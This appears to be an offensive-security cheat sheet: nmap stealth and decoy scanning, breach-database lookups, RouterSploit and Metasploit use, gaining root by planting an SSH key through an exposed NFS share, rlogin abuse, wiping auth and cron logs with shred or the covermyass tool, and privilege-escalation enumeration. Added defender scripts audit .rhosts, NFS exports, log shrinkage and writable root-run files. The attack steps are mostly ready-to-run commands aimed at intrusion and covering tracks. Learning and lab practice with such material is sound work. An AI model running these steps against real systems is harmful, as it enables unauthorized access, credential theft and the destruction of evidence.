Nmap is used for network reconnaissance, port scanning, OS detection or vulnerability scanning.
```sh
# Show TCP ports for a domain, ip, or range
nmap -sT domain.name.com.or.ip
# Similar to the command above but tries to be stealthy
nmap -sS domain.name.com.or.ip
# Perform aggressive scan
sudo nmap -A domain.name.com.or.ip
# Try to identify the OS of network machines
sudo nmap -O domain.name.com.or.ip
# Try to get the version number of the open applications
sudo nmap -sV domain.name.com.or.ip
# Run vulnerability analysis on all machines of the network
sudo nmap -sV -p21-8080 --script vulners 192.168.1.1/24
# Use decoy IP and MAC addresses to be extra stealthy (Sometimes using mac
# spoofing or too many decoys will make the analysis fail).
sudo nmap -O domain.name.com.or.ip -D RND:5 --spoof-mac 01:02:03:04:05:06
# Perform a service scan with a UDP scan and drop the initial ping.
sudo nmap -sS -sU -PN 192.168.1.1
```
Sherlock can be used to find the social networks on which a given username is registered.
- URL: https://github.com/sherlock-project/sherlock
```sh
python3 sherlock username
```
h8mail can be used to search a password breach database for passwords that have been leaked for one or more given email addresses.
```sh
# Query a single target
h8mail -t email@example.com
# Query a single target with a local breach dump
h8mail -t firstname.lastname@example.org -lb '/path/to/breach/compilation/directory'
# Query a list of targets without API calls against the Breach Compilation.
h8mail -t targets.txt -bc /path/to/breach/compilation/directory -sk
```
Shodan is a search engine for vulnerable internet-connected devices. Using it we can potentially find webcams, satellite telephones, etc. In some cases they are unsecured or use a simple user/password combination.
A high-performance offensive security tool for reconnaissance and vulnerability scanning. It is similar to nmap but offers more exhaustive analysis and more extensive reporting capabilities.
Try to find and exploit vulnerabilities in routers and embedded devices with the RouterSploit framework.
```sh
# Start the framework
python3 rsf.py
# Try autopwn
use scanners/autopwn
show options
set target 192.168.1.1
run
```
If the analysis has found vulnerabilities, the exploit can be run with:
```
use exploits/reported/exploit/path
set target 22.214.171.124
check
run
```
To find target devices, we can search open ports with nmap:
```sh
nmap -p 80,8080,8081,81 192.168.1.0/24
```
Metasploit is a framework for exploring and exploiting vulnerabilities.
A typical approach would be to:
- Perform exploration of a particular remote/local system to find vulnerabilities.
- Try to get shell access.
- Create a meterpreter session.
- Perform privilege escalation or exploit the current user permissions.
- Post exploitation, which might include clearing tracks (changing or shredding .zsh_history), installing a keylogger or backdoor, uploading and running viruses, downloading files, taking webcam pictures/videos, etc.
If the .rhosts file is misconfigured with `+ +` and the ports 512 (exec), 513 (login) and 514 (shell) are open, we can just log in using rsh-client without a user/password with:
```sh
rlogin -l root ip.or.domain.name
```
Exposed NFS filesystems
If port 2049 is open, this can mean that NFS is active on the target machine.
```sh
# Check rpc info to identify NFS
rpcinfo -p ip.or.domain.name
# Show what is being mounted, hopefully the / share (`/ *`)
showmount -e ip.or.domain.name
# Exploit this by mounting the root filesystem and adding our key to the
# authorized ssh keys for root. Note that for extra protection we could create
# a new ssh key for each attack instead of using the default one, that could give
# us away.
mount -t nfs ip.or.domain.name:/ /mnt
cat ~/.ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys
umount /mnt
ssh email@example.com
```
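A defender-side counterpart to the two trust misconfigurations above (the `+ +` entry in .rhosts/hosts.equiv and a root filesystem exported over NFS), added here as an example and not part of the original notes: two POSIX shell functions that read files in those formats and flag the permissive entries. The sample .rhosts and /etc/exports contents are constructed for the demo and do not come from any real host.

```sh
# Constructed sample files (not taken from any real host) so the checks run offline.
RHOSTS_SAMPLE='# constructed .rhosts
trusted.example.internal alice
+ +
+ bob
backup.example.internal'
EXPORTS_SAMPLE='# constructed /etc/exports
/srv/share 192.0.2.0/24(rw,sync,root_squash)
/ *(rw,no_root_squash)
/home *(rw)
/backup 192.0.2.10(ro)'

# Read an .rhosts or hosts.equiv file on stdin and print every entry whose host
# or user field is the "+" wildcard. Returns 1 if anything was flagged.
audit_rhosts() {
    rc=0
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in ''|'#'*) continue ;; esac
        set -f; set -- $line; set +f      # split fields without pathname expansion
        if [ "$1" = "+" ] || [ "${2:-}" = "+" ]; then
            printf 'RHOSTS wildcard trust: %s\n' "$line"; rc=1
        fi
    done
    return $rc
}

# Read an /etc/exports file on stdin and flag an export of the root filesystem,
# a "*" (any host) client and the no_root_squash option. Returns 1 if flagged.
audit_exports() {
    rc=0
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in ''|'#'*) continue ;; esac
        set -f; set -- $line; set +f
        path=$1; shift
        [ "$path" = "/" ] && { printf 'EXPORTS root filesystem: %s\n' "$line"; rc=1; }
        for spec in "$@"; do
            host=${spec%%\(*}                 # client part before "(options)"
            case "$spec" in *\(*\)) opts=${spec#*\(}; opts=${opts%\)} ;; *) opts= ;; esac
            [ "$host" = "*" ] && { printf 'EXPORTS any-host client: %s\n' "$line"; rc=1; }
            case ",$opts," in
                *,no_root_squash,*) printf 'EXPORTS no_root_squash: %s\n' "$line"; rc=1 ;;
            esac
        done
    done
    return $rc
}
printf '%s\n' "$RHOSTS_SAMPLE"  | audit_rhosts  || echo "rhosts: permissive entries found"
printf '%s\n' "$EXPORTS_SAMPLE" | audit_exports || echo "exports: risky exports found"
```

On a real host, feed the functions `/etc/hosts.equiv`, each user's `~/.rhosts` and `/etc/exports` instead of the samples.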
If we can tamper with some connection-oriented services, we could insert a backdoor that allows us to connect without anyone noticing. For example, in metasploitable2 there is a doctored vsftpd service that opens a backdoor if the username ends with the `:)` sequence, opening a listening shell on port 6200.
Very often we can find vulnerable web services, be it because of misconfiguration, default admin passwords, or simply because they are vulnerable to the common attacks that web apps are susceptible to. We can practice these with metasploitable2 on the Mutillidae web application.
- NOWASP: https://sourceforge.net/projects/mutillidae/
- TUTORIALS: https://www.youtube.com/user/webpwnized
Searching for vulnerabilities
There are different search engines and databases that we can use to try to find active vulnerabilities.
On Linux we can use the tool Searchsploit to search offline copies of vulnerability reports and exploits.
```sh
searchsploit kernel 2.6 linux | sort -n
```
It is important to read through the code of the exploits instead of blindly running things you find on the internet.
Removing log files
Some interesting log files that we want to get rid of (`rm -rf filename`), truncate (`truncate -s 0 filename`), shred (`shred -zu filename`) or even zero (`cat /dev/null > filename`):
```
/var/log/auth.log
/var/log/cron.log
/var/log/maillog
/var/log/httpd
```
There are some specified tools for this purpose, like covermyass:
```sh
wget "https://github.com/sundowndev/go-covermyass/releases/download/v0.2/go-covermyass_Linux_x86_64.tar.gz"
tar xfv go-covermyass_Linux_x86_64.tar.gz
chmod +x go-covermyass
./go-covermyass
```
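Added example, not from the original notes or from the covermyass project: a small baseline check a defender can run to notice that logs like the ones listed above have shrunk or disappeared since the last snapshot, which is what truncation, shredding or deletion looks like from the outside. The log directory and its contents in the demo are constructed.

```sh
# Record "size path" for every regular file under the given log directory.
snapshot_log_sizes() {
    find "$1" -type f | sort | while IFS= read -r f; do
        printf '%s %s\n' "$(wc -c < "$f" | tr -d ' ')" "$f"
    done
}

# Compare a saved snapshot (path given as $1) against the current files.
# A log that is now smaller than recorded, or gone, is reported; growth is
# normal and not reported. Returns 1 if anything was reported.
check_log_shrink() {
    rc=0
    while read -r size f; do
        if [ ! -f "$f" ]; then
            printf 'MISSING: %s\n' "$f"; rc=1
        else
            now=$(wc -c < "$f" | tr -d ' ')
            if [ "$now" -lt "$size" ]; then
                printf 'SHRUNK: %s (%s -> %s bytes)\n' "$f" "$size" "$now"; rc=1
            fi
        fi
    done < "$1"
    return $rc
}

# Demo on a constructed directory: take a baseline, simulate a truncation of one
# file and a deletion of another, then run the check.
demo_dir=$(mktemp -d)
baseline=$(mktemp)
printf 'Accepted publickey for alice from 192.0.2.7\n' > "$demo_dir/auth.log"
printf 'CRON[1234]: (root) CMD (run-parts /etc/cron.hourly)\n' > "$demo_dir/cron.log"
printf 'GET /index.html 200\n' > "$demo_dir/access.log"
snapshot_log_sizes "$demo_dir" > "$baseline"
: > "$demo_dir/auth.log"           # constructed file truncated to zero bytes
rm -f "$demo_dir/cron.log"         # constructed file removed
check_log_shrink "$baseline" || echo "log tampering indicators found"
rm -rf "$demo_dir" "$baseline"
```

In practice the snapshot should be written to a location the monitored host cannot modify (remote log collector or read-only media), otherwise it can be rewritten along with the logs.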
If you manage to get a shell to the target machine, there are several things you can do to try to get root. First of all, do some local research:
- System info:
- Who else has logged in:
- Is the user in sudoers:
- Are there other root users:
```sh
grep -v -E "^#" /etc/passwd
```
- What is the network configuration:
- Is there something interesting on the bash/shell history?
You can gather more intel about running services and versions of software to try to detect the attack surface.
- Enumerate services, especially those being run by root:
- List versions of installed software:
At this stage you can use searchsploit to try to find vulnerabilities on the kernel, privileged services or anything that caught your attention.
Because simple solutions are always better, try to get more info from:
- SUID/SGID files:
```sh
find / -perm -u=s -type f 2>/dev/null
```
- Password hashes:
- Can you overwrite files that will get run by root?
- Check jobs/tasks:
```sh
ls -la /etc/cron*
```
- Are the ssh keys of any user readable or modifiable:
```sh
ls -la ~/.ssh
```
- Are there any cleartext credentials in various configuration files:
```sh
find . -type f -maxdepth 4 | xargs grep -i "password"
```
- Check file/folder permissions, especially on home directories and backups.
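The SUID/SGID, cron and permission checks above from the defender's side, as an added example that is not part of the original notes: these functions find files that root would execute but that other users can modify, which is the condition the "can you overwrite files that will get run by root" question is about. The directory list in `audit_root_run_paths` is an assumption about typical Linux layouts, not something the page specifies.

```sh
# Print each world-writable file or directory under the given roots. A script
# in a cron directory or a binary in a root-run PATH that anyone can edit lets
# a local user change what root executes. Returns 1 if anything was found.
find_world_writable() {
    out=$(find "$@" \( -type f -o -type d \) -perm -002 2>/dev/null | sort)
    [ -z "$out" ] && return 0
    printf '%s\n' "$out" | sed 's/^/WORLD-WRITABLE /'
    return 1
}

# Print SUID/SGID files under the given roots that are group- or world-writable,
# i.e. a privileged program that others can rewrite. Returns 1 if found.
find_writable_setid() {
    out=$(find "$@" -type f \( -perm -4000 -o -perm -2000 \) \
               \( -perm -020 -o -perm -002 \) 2>/dev/null | sort)
    [ -z "$out" ] && return 0
    printf '%s\n' "$out" | sed 's/^/WRITABLE-SETID /'
    return 1
}

# Run both checks over the locations root typically executes from (assumed
# typical Linux paths). Directories missing on this host are skipped by find.
audit_root_run_paths() {
    status=0
    find_world_writable /etc/cron.d /etc/cron.daily /etc/cron.hourly \
        /etc/cron.weekly /etc/cron.monthly /etc/crontab /etc/init.d \
        /usr/local/bin /usr/local/sbin || status=1
    find_writable_setid /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin \
        /bin /sbin || status=1
    return $status
}

audit_root_run_paths || echo "writable root-run locations found"
```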
Sometimes complicated things can pay off also!
- Check for shell/exec system calls in root programs to try to set the path of custom executables. For example, if a system call uses the `grep` program from within a root/SUID/SGID file without an explicit path, we can create a custom `grep` that runs an exploit, put it as an executable in the local directory and export the current path with
- Missing DLLs
- Service hijacking